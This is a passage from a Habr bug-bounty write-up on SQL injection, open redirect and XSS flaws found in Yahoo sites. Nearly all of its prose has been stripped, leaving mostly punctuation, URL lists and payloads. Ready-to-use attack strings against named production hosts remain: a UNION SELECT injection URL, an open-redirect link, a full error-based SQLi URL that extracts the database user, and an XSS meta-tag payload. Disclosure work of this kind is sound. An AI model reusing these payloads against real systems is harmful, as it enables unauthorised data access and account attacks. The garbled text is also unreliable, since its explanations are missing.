http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .Source: https://habr.com/ru/post/212317/
All Articles